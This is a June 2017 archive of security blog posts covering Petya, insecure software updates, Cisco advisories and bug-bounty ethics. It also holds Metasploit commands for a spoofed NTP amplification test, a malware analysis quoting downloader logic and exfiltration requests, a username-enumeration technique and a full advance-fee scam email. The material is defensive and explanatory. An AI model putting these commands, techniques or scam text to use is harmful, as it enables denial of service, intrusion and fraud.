Monthly Archives: June 2017

Petya Malware Variant (Update C)

This updated alert is a follow-up to the updated alert titled ICS-ALERT-17-181-01B Petya Malware Variant that was published July 5, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of reports of a variant of the Petya malware that is affecting several countries. ICS-CERT is releasing this alert to enhance the awareness of critical infrastructure asset owners/operators about the Petya variant and to identify product vendors that have issued recommendations to mitigate the risk associated with this malware.

The Consequences of Insecure Software Updates

In this blog post, I discuss the impact of insecure software updates as well as several related topics, including mistakes made by software vendors in their update mechanisms, how to verify the security of a software update, and how vendors can implement secure software updating mechanisms.

Earlier in June of this year, I published two different vulnerability notes about applications that update themselves insecurely:

  • VU#846320 - Samsung Magician fails to update itself securely
  • VU#489392 - Acronis True Image fails to update itself securely

In both of these cases, the apparent assumption the software makes is that it is operating on a trusted network and that no attacker would attempt to modify the act of checking for or downloading the updates. This is not a valid assumption to make.

Consider the situation where you think you're on your favorite coffee shop's WiFi network. If you have a single application with an insecure update mechanism, you are at risk to be a victim of what's known as an evilgrade attack. That is, you may inadvertently install code from an attacker during the software update process. Given that software updaters usually run with administrative privileges, the attacker's code will subsequently run with administrative privileges as well. In some cases, this can happen with no user interaction. This risk has been publicly known since 2010.

The dangers of an insecure update process are much more severe than an individual user being compromised while on an untrusted network. As the recent ExPetr/NotPetya/Petya wiper malware has shown, the impact of insecure updates can be catastrophic. Let me expand on this topic by discussing several important aspects of software updates:

  1. What mistakes can software vendors make when designing a software update mechanism?
  2. How can I verify that my software performs software updates securely?
  3. How should vendors implement a secure software update mechanism?

Insecure Software Updates and Petya

Microsoft has reported that the Petya malware originated from the update mechanism for the Ukrainian tax software called MEDoc. Because of my language barrier, I was not able to thoroughly exercise the software. However, with the help of CERT Tapioca, I was able to see the network traffic that was being used for software updates. This software makes two critical mistakes in its update mechanism: (1) it uses the insecure HTTP protocol and (2) the updates are not digitally signed

These are the same two mistakes that the vulnerable Samsung Magician software (VU#846320) and the vulnerable Acronis True Image software (VU#489392) contain. Let's dig in to the two main flaws in software updaters:

Use of an Insecure Transport Layer

HTTP is used in a number of software update mechanisms, as opposed to the more-secure HTTPS protocol. What makes HTTPS more secure? Properly-configured HTTPS communications attempt to achieve three goals:

  1. Confidentiality - Traffic is protected against eavesdropping.
  2. Integrity - Traffic content is protected against modification.
  3. Authenticity - The client verifies the identity of the server being contacted.

Let's compare the differences between an update mechanism that uses a properly configured HTTPS protocol versus one that uses either HTTP or HTTPS but without validating certificates :

Properly-configured HTTPS Software update request content is not visible to attackers. Software update requests cannot be modified by an attacker
Software update traffic cannot be redirected by an attacker
HTTP or HTTPS that is not validated An attacker can view the contents of software update requests. An attacker can modify update requests or responses to modify the update behavior or outcome. An attacker can intercept and redirect software update requests to a malicious server.

Based on its inability to address these three goals, it is clear that HTTP is not a viable solution for software update traffic.

Lack of Digital Signatures for Updates

If software updates are not digitally signed, or if the software update mechanism does not validate signatures, the absence of digital signatures can allow an attacker to replace a software update with malware. A simple test that I like to do when testing software updaters is to test if the software will download and install calc.exe from Windows instead of the expected update. If calc.exe pops up when the update occurs, we have evidence of a vulnerable update mechanism!

Verifying Software Updaters

CERT Tapioca can be used to easily observe if an application uses HTTP or non-validated HTTPS traffic for updates. Any update traffic that appears in the Tapioca mitmproxy window is an indication that the update uses an insecure transport layer. As long as the mitmproxy root CA certificate is not installed on the client system, the only traffic that will appear in the mitmproxy window will be HTTP traffic and HTTPS traffic that is not checked for a trusted root CA, both of which are insecure.

Determining whether an application validates the digital signatures of updates requires a little more work. Essentially, you need to intercept the update and redirect it to an update under your control that is either unsigned or signed by another vendor.

A "Belt and Suspenders" Approach to Updates

If an update mechanism uses HTTPS, it should ensure that a software update mechanism is only communicating with a legitimate update server, right? And shouldn't that be enough to ensure a secure update? Well, not exactly.

First, HTTPS is not without flaws. There have been a number of flaws in various protocols and ciphersuites supported by HTTPS, including FREAK, DROWN, BEAST, CRIME, BREACH, and POODLE. These known flaws, which were fixed in HTTPS communications using modern TLS protocols, can weaken the confidentiality, integrity, and authenticity goals that HTTPS aims to provide. It is also important to realize that even without such flaws, HTTPS without pinning can ensure website authenticity only to the level that the PKI and certificate authority architecture allow. See Moxie Marlinspike's post SSL and the Future of Authenticity for more details.

HTTPS flaws and other weaknesses aside, using HTTPS without signature-validated updates leaves a large open hole that can be attacked. What happens if an attacker can compromise an update server? If software update signatures are not validated, a compromise of a single server can result in malicious software being deployed to all clients. There is evidence that this is exactly what happened in the case of MEDoc.

virus_attack.pngSource: / Google translate

Using HTTPS can help to ensure both the transport layer security as well as the identity of the update server. Validating digital signatures of the updates themselves can help limit the damage even if the update server is compromised. Both of these aspects are vital to the operation of a secure software update mechanism.

Conclusion and Recommendations

Despite evilgrade being a publicly-known attack for about seven years now, it is still a problem. Because of the nature of how software is traditionally installed on Windows and Mac systems, we live in a world where every application may end up implementing its own auto-update mechanism independently. And as we are seeing, software vendors are frequently making mistakes in these updaters. Linux and other operating systems that use package-management systems appear to be less affected by this problem, due to the centralized channel through which software is installed.

Recommendations for Users

So what can end users do to protect themselves? Here are my recommendations:

  • Especially when on untrusted networks, be wary of automatic updates. When possible, retrieve updates using your web browser from the vendor's HTTPS website. Popular applications from major vendors are less likely to contain vulnerable update mechanisms, but any software update mechanism has the possibility of being susceptible to attack.
  • For any application you use that contains an update mechanism, verify that the update is at least not vulnerable to a MITM attack by performing the update using CERT Tapioca as an internet source. Virtual machines make this testing easier.

Recommendations for Developers

What can software developers do to provide software updates that are secure? Here are my recommendations:

  • If your software has an update mechanism, ensure that it both:
    • Uses properly validated HTTPS for a communications channel instead of HTTP
    • Validates digital signatures of retrieved updates before installing them
  • To protect against an update server compromise affecting your users, ensure that the code signing key is not present on the update server itself. To increase protection against malicious updates, ensure the code signing key is offline, or otherwise unavailable to an attacker.

Enterprise Security Weekly #51 – Idempotency

Apollo Clark joins us to discuss managing AWS cloud resources, docker security in the enterprise is our topic for the week, and we discuss the latest enterprise news!Full Show Notes: for all the latest episodes!

Cisco Netflow Generation Appliance Software 1.0(2) unresponsive Denial Of Service Vulnerability

A vulnerability in the Stream Control Transmission Protocol (SCTP) decoder of the Cisco NetFlow Generation Appliance (NGA) with software before 1.1(1a) could allow an unauthenticated, remote attacker to cause the device to hang or unexpectedly reload, causing a denial of service (DoS) condition. The vulnerability is due to incomplete validation of SCTP packets being monitored on the NGA data ports. An attacker could exploit this vulnerability by sending malformed SCTP packets on a network that is monitored by an NGA data port. SCTP packets addressed to the IP address of the NGA itself will not trigger this vulnerability. An exploit could allow the attacker to cause the appliance to become unresponsive or reload, causing a DoS condition. User interaction could be needed to recover the device using the reboot command from the CLI. The following Cisco NetFlow Generation Appliances are vulnerable: NGA 3140, NGA 3240, NGA 3340. Cisco Bug IDs: CSCvc83320.

Petya Ransomware: What You Need to Know and Do

By: Andrew Hay

Unless you’ve been away from the Internet earlier this week, you’ve no doubt heard by now about the global ransomware outbreak that started in Ukraine and subsequently spread West across Western Europe, North America, and Australia yesterday. With similarities reminiscent to its predecessor WannaCry, this ransomware attack shut down organizations ranging from the Danish shipping conglomerate Maersk Line to a Tasmanian-based Cadbury chocolate factory.

I was asked throughout the course of yesterday and today to help clarify exactly what transpired. The biggest challenge with any surprise malware outbreak is the flurry of hearsay, conjecture, speculation, and just plain guessing by researchers, analysts, and the media.

At a very high level, here is what we know thus far:

  • The spread of this campaign appears to have originated in Ukraine but has migrated west to impact a number of other countries, including the United States where pharmaceutical giant Merck and global law firm DLA Piper were hit
  • The initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MeDoc
  • This appears to be a piece of malware utilizing the EternalBlue exploit disclosed by the Shadow Brokers back in April 2017 when the group released several hacking tools obtained from the NSA
  • Microsoft released a patch in March 2017 to mitigate the discovered remote code execution vulnerabilities that existed in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handled certain requests
  • The malware implements several lateral movement techniques:
    • Stealing credentials or re-using existing active sessions
    • Using file-shares to transfer the malicious file across machines on the same network
    • Using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines
  • Experts continue to debate whether or not this is a known malware variant called Petya but several researchers and firms claim that this is a never before seen variant that they are calling GoldenEye, NotPetya, Petna, or some other random name such as Nyetya
  • The jury is still out on whether or not the malware is new or simply a known variant


Who is responsible?

The million dollar question on everyone’s mind is “was this a nation-state backed campaign designed to specifically target Ukraine”? We at LEO believe that to be highly unlikely for a number of reasons. The likelihood that this is an opportunistic ransomware campaign with some initial software package targets is far more likely scenario than a state-sponsored actor looking to destabilize a country.

Always remember the old adage from Dr. Theodore Woodward: When you hear hoofbeats, think of horses not zebras.

If you immediately start looking for Russian, Chinese, or North Korean state-sponsored actors around every corner, you’ll inevitably construct some attribution and analysis bias. Look for the facts, not the speculation.

What does LEO recommend you do?

We recommend customers that have not yet installed security update MS17-010 to do so as soon as possible. Until you can apply the patch, LEO also recommends the following steps to help reduce the attack surface:

  • Disable SMBv1 with the steps documented at Microsoft Knowledge Base Article 2696547
  • Block incoming SMB traffic from the public Internet on port 445 and 139, adding a rule on your border routers, perimeter firewalls, and any intersecting traffic points between a higher security network zone to a lower security network zone
  • Disable remote WMI and file sharing, where possible, in favor of more secure file sharing protocols
  • Ensure that your logging is properly configured for all network-connected systems including workstations, servers, virtualized guests, and network infrastructure such as routers, switches, and firewalls
  • Ensure that your antimalware signatures are up-to-date on all systems (not just the critical ones)
  • Review your patch management program to ensure that emergency patches to mitigate critical vulnerabilities and easily weaponized attacks can be applied in an expedited fashion
  • Finally, consider stockpiling some cryptocurrency, like Bitcoin, to reduce any possible transaction downtime should you find that your organization is forced to pay the ransom. Attempting to acquire Bitcoin during an incident may be time-prohibitive


Should your organization need help or clarification on any of the above recommendations, please don’t hesitate to reach out to LEO Cyber Security for immediate assistance.

Further reading

The post Petya Ransomware: What You Need to Know and Do appeared first on LEO Cyber Security.

Follow up to the vuln disclosure post

Summary of responses from this post:

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (less than I hoped for though). To summarize a few:

-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln but I should not expect them.

-Bug Bounty awards are appreciation for the work not a right.

-Someone made a nice analogy to losing AWS/Slack keys to losing a cell phone or cat.  Every person might value the return of that cat or phone differently.

-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train.  **I think this is not quite the same situation but I appreciate the comment**

-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.

-They [the vulns] have value - just not monetary. The value is to the end-user.

-Generally speaking, I [the author of the comment] think quite a lot of the BB crowd have a self-entitled, bad attitude.

-Always ask yourself if this will hurt innocent people. If so, report it, but make sure the public knows that they f*cked it up.

This blog post reply:

I got a variety responses from it's the right thing to do... up to if they don't pay up, they don't get the info. Collectively,  I don't think we are any closer to an answer.

To get a bit more personal on the subject. I think this piece from Ferris Bueller's Day Off sums it up to an extent:

"The problem is with me"

I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment.  I believe I have identified what component brings me the most enjoyment and will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

More things to think about for sure :-)

Hack Naked News #131 – June 28, 2017

DoD networks have been compromised, the Shadow Brokers continue their exploits, a Pennsylvania healthcare system gets hit with Petya, and more. Jason Wood of Paladin Security joins us to discuss nations' offensive technical strengths and defensive weaknesses on this episode of Hack Naked News!Full Show Notes: for all the latest episodes!

Email Provider Disables Ransomware Mailbox – Good or Bad?

Here's a headline that will likely make you cheer.
Or it'll make your heart sink as you realize your files are now gone. Forever

Or maybe it'll get you thinking like it did for me...
Email Provider Shuts Down Petya Inbox Preventing Victims From Recovering Files
I read this line and started thinking ... oh my God ... what are some of the victims going to do?!
"The German email provider's decision is catastrophic news for Petya victims, as they won't be able to email the Petya author in the case they want to pay the ransom to recover sensitive files needed for urgent matters."

While I believe Posteo had good intentions, I believe the net result will be a bad situation made significantly worse. In a ransomware scenario you have three options:

  • Pay up (hope you get your stuff back)
  • Ignore it and restore from back up (and hope your stuff is backed up)
  • Hope like hell someone cracks the encryption/software/attacker in time to get your files back without having to pay (hey, it's happened before)
The problem is if you're a Petya victim option #1 is no longer open to you. There are several scenarios where a victim could have no choice but to pay up, like when backups aren't available (or they haven't planned that far ahead). Now, a few friends on Twitter made a valid argument for what Posteo did - including that they wanted to stop funding an attacker and ultimately had a criminal on their hands they wanted to shut down. All well and good - but think of the impact.

While I don't think it hurts the email provider to continue to keep the mailbox open, closing it down is catastrophic. It's irresponsible. And maybe even a little mean-spirited. Unless you're willing to argue that you've never been a victim, or that you "deserved what you got" (which is a BS argument) this action by Posteo is insane.

On the other side of this coin, there are very good reasons to keep the mailbox open. For example it could provide some insight into the attacker/criminal. Maybe the attacker accidentally accesses the inbox from their home cable modem and investigators can track them down that way. You never know. There's the obvious reason that people should get their files back if they have no other alternative but to pay and we know that is the case in many, many, many cases.

What do you think? I think what Posteo did was rash and maybe a little stupid. Clearly they're not thinking about the victims here - and that's irresponsible.

-- Edit 27-June-17 @ 11:46pm

So this is interesting and helps understand the scope of what's affected and who is impacted. Still think it was a bright idea to kill that mailbox?

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard


Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering  companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day".  These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.

Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something?  If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level?  mom and pop maybe not, VC funded startup?  30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough or have we evolved as a society where basically everything deserves some sort of monetary reward. After being an observer for two BB programs...."f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro" does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes]
Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomeware'd or their EC2 infra shut down/turned off/deleted codespaces style am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty signifiant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably wont get $$ make me a "bad person"? numbers 1-3 come into play here for sure

My last two jobs, I've worked for companies that had Bug Bounty programs so my opinion on the above is DEFINITELY shaped by working for companies that  get it understand and care about their security posture and do feel that reporting security issues by outside researchers has monetary value. An added benefit to have a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.

Thoughts/comments VERY welcome on this one.  Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route.  I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.


Startup Security Weekly #45 – Walking In Pajamas

Fred Kneip of CyberGRX joins us. In the news, why most startups fail, conference season tips, the question you need to ask before solving any problem, and updates from GreatHorn, Cybereason, Amazon, and more!Full Show Notes: for all the latest episodes!

Cisco Email Security Appliance 9.7.1-hp2-207 Bypass a restriction or similar Vulnerability

A vulnerability in the content scanning engine of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to bypass configured message or content filters on the device. Affected Products: This vulnerability affects all releases prior to the first fixed release of Cisco AsyncOS Software for Cisco Email Security Appliances, both virtual and hardware appliances, if the software is configured to apply a message filter or content filter to incoming email attachments. The vulnerability is not limited to any specific rules or actions for a message filter or content filter. More Information: CSCuz16076. Known Affected Releases: 9.7.1-066 9.7.1-HP2-207 9.8.5-085. Known Fixed Releases: 10.0.1-083 10.0.1-087./Excerpt>

Enterprise Security Weekly #50 – Losing More Hair

Brian Ventura of SANS Institute and Ted Gary of Tenable join us. In the news, five ways to maximize your IT training, pocket-sized printing, 30 years of evasion techniques, and more on this episode of Enterprise Security Weekly!Full Show Notes: for all the latest episodes!

NTP/SNMP amplification attacks

I needed to verify a SNMP and NTP amplification vulnerability was actually working.

Metasploit  has a few scanners for ntp vulns in the auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to> (1 hosts)

[+] - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification

I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address.  I  ran tcpdump on the target/spoofed server (yes...listening for UDP packets) it was receiving no UDP packets when I ran the attack.  If I didn't spoof the source IP,  the vulnerable server would send data back to the attacker IP but not the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP
msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to> (1 hosts)

[*] Sending 1 packet(s) to from

To rule out it wasn't a Metasploit thing I also worked thru the attack with scapy following the examples here:

So I asked on Twitter...fucking mistake...after getting past the trolls and well intentioned people that didn't think I understood basic networking/spoofing at all (heart u) link #1,  link #2 as the likely reason I couldn't spoof the IP. As well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later I found which allows you to check and see if a particular ASN supports spoofing along with the stats that only 20% of the Internet allows spoofing.


Checking common ISP and cloud provider ASNs showed that most weren't vulnerable to spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.

Someone asked if the vuln host was receiving the traffic. I couldn't answer for the initial host but to satisfy my curiosity on the issue  I built a vulnerable NTP server and it did NOT receive the traffic even with hosts from the same VPS provider in the same data center (different subnets).

Hack Naked News #130 – June 20, 2017

Hacking military phone systems, IoT malware activity doubles, more WikiLeaks dumps, decade-old Linux bugs, and more. Jason Wood of Paladin Security joins us to discuss the erosion of ISP privacy rules on this episode of Hack Naked News!Full Show Notes: for all the latest episodes!

Who falls for this?

Sometimes a spammer hits my inbox with something so amusing I feel like I have to share. Check this one out. I can't tell you the last time I received something with such bad grammar, trying so hard to sound official yet catastrophically failing.

Anyway, I think you'll enjoy this one as much as I did.

Federal Bureau of Investigation (FBI)
Anti-Terrorist And Monitory Crime Division.
Federal Bureau Of Investigation.
J.Edgar.Hoover Building Washington Dc
Customers Service Hours / Monday To Saturday
Office Hours Monday To Saturday:
Dear Beneficiary,
Series of meetings have been held over the past 7 months with the secretary general of the United Nations Organization. This ended 3 days ago. It is obvious that you
have not received your fund which is to the tune of $16.5million due to past corrupt Governmental Officials who almost held the fund to themselves for their selfish
reason and some individuals who have taken advantage of your fund all in an attempt to swindle your fund which has led to so many losses from your end and unnecessary
delay in the receipt of your fund.for more information do get back to us.
The National Central Bureau of Interpol enhanced by the United Nations and Federal Bureau of Investigation have successfully passed a mandate to the current Prime
Minister of Cambodia Excellency Hun Sen to boost the exercise of clearing all foreign debts owed to you and other individuals and organizations who have been found not
to have receive their Contract Sum, Lottery/Gambling, Inheritance and the likes. Now how would you like to receive your payment? because we have two method of  payment
which is by Check or by ATM card?
ATM Card: We will be issuing you a custom pin based ATM card which you will use to withdraw up to $5,000 per day from any ATM machine that has the Master Card Logo on
it and the card have to be renewed in 4 years time which is 2022. Also with the ATM card you will be able to transfer your funds to your local bank account. The ATM
card comes with a handbook or manual to enlighten you about how to use it. Even if you do not have a bank account.
Check: To be deposited in your bank for it to be cleared within three working days. Your payment would be sent to you via any of your preferred option and would be
mailed to you via FedEx. Because we have signed a contract with FedEx which should expire 25th of June 2017 you will only need to pay $180 instead of $420 saving
you $240 so if you
Pay before the one week you save $240 note that any one asking you for some kind of money above the usual fee is definitely a fraudsters and you will have to stop
communication with every other person if you have been in contact with any. Also remember that all you will ever have to spend is $180.00 nothing more! Nothing less!
And we guarantee the receipt of your fund to be successfully delivered to you within the next 24hrs after the receipt of payment has been confirmed.
Note: Everything has been taken care of by the Government of Cambodia,The United Nation and also the FBI and including taxes, custom paper and clearance duty so all
you will ever need to pay is $180.
DO NOT SEND MONEY TO ANYONE UNTIL YOU READ THIS: The actual fees for shipping your ATM card is $420 but because FedEx have temporarily discontinued the C.O.D which
gives you the chance to pay when package is delivered for international shipping We had to sign contract with them for bulk shipping which makes the fees reduce from
the actual fee of $420 to $180 nothing more and no hidden fees of any sort!To effect the release of your fund valued at $16.5million you are advised to contact our
correspondent in Asia the delivery officer Miss.Chi Liko with the information below,
You are adviced to contact her with the informations as stated below:
Your full Name..
Your Address:..............
Home/Cell Phone:..............
Preferred Payment Method ( ATM / Cashier Check )
Upon receipt of payment the delivery officer will ensure that your package is sent within 24 working hours. Because we are so sure of everything we are giving you a
100% money back guarantee if you do not receive payment/package within the next 24hrs after you have made the payment for shipping.
Yours sincerely,
Miss Donna Story

Enterprise Security Weekly #49 – 7 Layers

Paul and John discuss malware and endpoint defense. In the news, Carbon Black releases Cb Response 6.1, what to ask yourself before committing to a cybersecurity vendor, Malwarebytes replaces antivirus with endpoint protection, and more on this episode of Enterprise Security Weekly!Full Show Notes: for all the latest episodes!

False Flag Attack on Multi Stage Delivery of Malware to Italian Organisations

Everything started from a well edited Italian language email (given to me from a colleague of mine, thank you Luca!) reaching out many Italian companies. The Italian language email had a weird attachment: ordine_065.js (it would be "Order Form" in English) which appeared "quite malicious" to me.

By editing the .js attachment it becomes clear that it is not an "order form" but contrary it turns out to be a downloader. The following image shows the .JS content. Our reverse adventure is going to start: we are facing a first stage of infection.

Stage 1: Downloader
The romantic dropper (code on the previous image) downloads and executes a PE file (let's call it Second stage) from The IP address seems to be hosted by a telecommunication company who sells cloud services such as: dedicated servers, colocation systems, and so on located in Ukraine. The used language in the current stage perfectly fits the dropping website language. Please keep in mind this language since later on, it would become a nice find.

By listing the, we might appreciate an nice malware "implant" where multiple files are in place, probably to serve multiple attack vectors (es: emails, or tag inclusions, or script inclusion into benevolent html files). My first analysis was on obf.txt (the following image shows a small piece of it) which woke up my curiosity.

Lateral Analysis: obf.txt
That piece of VB code, could be used to obfuscate VBScripts. Many pieces of code belonging to obf.txt are related to the Russian thread where dab00 published it on  2011. Another interesting file is the Certificate.js which shows the following code.

Lateral Analysis: Certificate.js
Quite an original technique to hide a Javascript File ! As you might see private and public keys are quoted by resulting a valid .js file which would be correctly interpreted by a js engine. Following this way, before getting into our real attack path represented by the set.tmp file, from Stage: 1 (ref. Image Stage: 1), the decision landed on performing some slow and intensive manual transformations in order to evaluate the result of GET "" (content in the following image). Certificate.js gets that data and evaluates it through the function: eval(""+Cs+"")

Lateral Analysis: P8uph16W evaluated javascript
Once beautified it becomes easier to read:

Lateral  Analysis: Fresh IoC on Dropper 2
Now, it's obvious that it tries to: (i) download stat.exe from third party web sources, (ii) to rename the downloaded file using the Math.random().toString(36).substr(2, 9) + ".exe" and to (iii) launch it by using the var VTmBaOw = new ActiveXObject("WScript.Shell");  This is super fun and interesting but I am getting faraway from my original attack path.

So, let's assume the downloaded file are the same (really they are not) and lets get back to our original Stage 1 where a romantic .JS dropper downloads the "set.tmp" file and executes it  (please refer to image Stage 1: Downloader).

The dropped file is: 00b42e2b18239585ed423e238705e501aa618dba which is actually evading SandBoxes and AntiVirus engines. It is a PE file which has been implemented in a valid .NET compiled source. Let's call it Stage 2, since coming after the Stage 1 ;). Decompiling the "Second stage" some "ambiguous and oriental characters" appear as content in the "array" variable (please refer to the following code image).

Stage 2: Oriental Characters in array
 By following those "interesting strings" ("interesting strings" by meaning to be faraway from the previous detected language) I landed on a "reflective function" which used a .NET Assembly.Load() to dynamically load the binary translation of the "array"-variable and an EntryPoin.Invoke() to dynamically run the binary. This is a well known .NET technique exploiting the .NET language ability to introspect its own runtime.

Stage 2: Assembly.Load and EntryPoint.Invoke
In order to get the dynamically generate binary "array"-variable I decided to patch the Sample code. The following picture shows how the .NET has been patched, in other words by simply forcing the control flow to saves the dynamically generated content on HD (the red breakpoint). In this specific case we are facing a third stage of infection composed by an additional PE file (Let's have a look to HexEditor for the  'MZ' string). Let's call it Stage 3.

Stage 3: Decrypted PE
In order to create the Stage 3, Stage 2 needed to decrypt the binary translation of "array" variable. Analysing the .NET code is not hard to figure out where Stage 2 decrypts the Stage 3. The Decryption loop has been implemented through a simple XOR-based encryption  algorithm within a hardcoded key as shown in the following image.

Stage 2: decryption key
The decrypted new stage (named: Stage 3) happens to be an interpreted PE file as well !  It is built over Microsoft VisualBasic technology (Do you remember the  Lateral Analysis ??) and it's hardy obfuscated (maybe from obf.txt ? ... of course !). The following image shows the Third Stage structure.

Stage 3: Structure
The structures highlights three main modules as follows:

1) Anti Module. Aim of such a module is to implement various evasion techniques in order to weaponize  the sample and block execution on VMs.
2) Service. Aim of such a module is to launch a background service.
3) RunPe. Aim of such a module is to launch an additional encrypted PE file placed in the resource folder.

Let's try to investigare a little bit better what these modules do. The Anti Module tries to figure out if the analysed sample lands on a controlled (emulated and/or simulated) environment in order to change its behaviour. The following images shows some of the performed checks. The sample tries to identify SanBoxie, fiddler and wireshark in order to dynamically change its own behaviour.

Stage 3: evasion checks

The service module tries to spawn a windows service and to disable many Windows features such as for example (but not limited to): EnableLUA, DisableCMD, DisableTaskMgr, etc... The following image shows some of the described actions.

Stage 3: Disabling Windows "Protections"
 Finally the RunPE modules decrypts a further encrypted and embedded resource an tries to run it. The following images show the decryption loop following by the decrypted payload.

Stage 3: Decryption Loop

Stage 3: decrypted payload

On line 253 the Third Stage decrypts the resource and executes it. In the above picture you might appreciate the decrypted sequence: 0x4D, 0x5A, 0x90 which happens to be an additional windows PE. Let's call it Stage: 4.  The new stage appears to be a classic PE file written on C++, we'll need a debugger to get into it.  By analysing its dynamic behaviour (thanks to IDA Pro) it has been easy to catch the dropped files and to understand how that Sample uses them. The following image shows two dropped files  (.nls and .bat) being saved on the HardDrive after the Stage 4 call.

Stage 4: dropping files (.nls and .bat)
The resulting .bat file tries to execute (through cmd.exe /c)  %1 within the parameter %2 as shown in the next picture. If the file to be executed does not exist in HD it deletes the original file as well (itself).

Stage 4: file execution

%1 is an additional dropped PE File while %2 is a "random" value (key? unique id?).

Stage 4: Interesting "keys" passed to the .bat file.
Once the sample is run it performs external requests such the following ones, exfiltrating encrypted informations:

GET /htue503dt/images/uAsMyeumP3uQ/LlAgNzHCWo8/XespJetlxPFFIY/VWK7lnAXnqTCYVX_2BL6O/vcjvx6b8nqcXQKN3/J6ga_2FN2zw6Dv6/r5EUJoPCeuwDIczvFL/kxAqCE1du/yzpHeaF3r0pY4KFUCyu0/jDoN_2BArkLgWaG/fFDxP.gif HTTP/1.1

POST /htue503dt/images/YtDKOb7fgj_2B10L/MN3zDY9V3IPW9vr/JSboSiHV4TAM_2BoCU/LocIRD_2B/MEDnB2QG_2Bf2dbtio8H/_2BLdLdN21RuRQj3xt2/SDWwjjE2JeHnPcsubnBWMG/NJUCRhlTnTa9c/5Dzpqg92/AypuGS6etix2MQvl1C8/V.bmp HTTP/1.1

Interesting to observe the sample complexity and how it is currently spread over Italian organisations. Interesting (at least on my personal point of view) how False flag attacks are developed in order to confuse the attack attribution (which is nowadays a huge technical issue)  as well. Unfortunately nowadays through the information I have it is not possible to attribute that attack, the dropper has Russian strings on it, one of the payload has "oriental characters" on it, but again I am not able to say the attack is the result of a "joint venture" from Russia and China or it's something hybrid or again it is borrowed or acquire from one to another, etc.. etc... For sure it's not as it appears :D ! 

Index Of Compromise:
Following some of the most interesting Index Of Compromise.

Simple Username Harvesting (from SANS SEC542)

Go to a web site that requires a login. Put in any username with any password. Did the page come back with both the User and Password fields blank? Now put YOUR username in, but with some password you make up. Does the form come back with your username in the User field and nothing in the Password field? If so, here's what you just discovered. The developer is making his form more efficient by not hashing and testing the password to see if it's correct unless the username is valid. If the username IS valid, he populates the User field with it and checks the password. If the password is incorrect, he only clears the Password field so you can retry your password. You just discovered a crude form of username harvesting. Try different usernames and if they remain in the User field, that's a valid account on the server. I know, that would take a lot of time to do it that way. That's why hackers write automated tools.

Hack Naked News #129 – June 13, 2017

How to delete an entire company, GameStop suffers a breach, Macs do get viruses, Docker released LinuxKit, and more. Jason Wood of Paladin Security joins us to discuss the military beefing up their cybersecurity reserve on this episode of Hack Naked News!Full Show Notes: for all the latest episodes!

Solving b-64-b-tuff: writing base64 and alphanumeric shellcode

Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There's an easy solution - using an alphanumeric encoder - but what's the fun in that? (also, I didn't think of it :) ). I'm going to cover base64, but these exact same principles apply to alphanumeric - there's absolutely on reason you couldn't change the SET variable in my examples and generate alphanumeric shellcode.

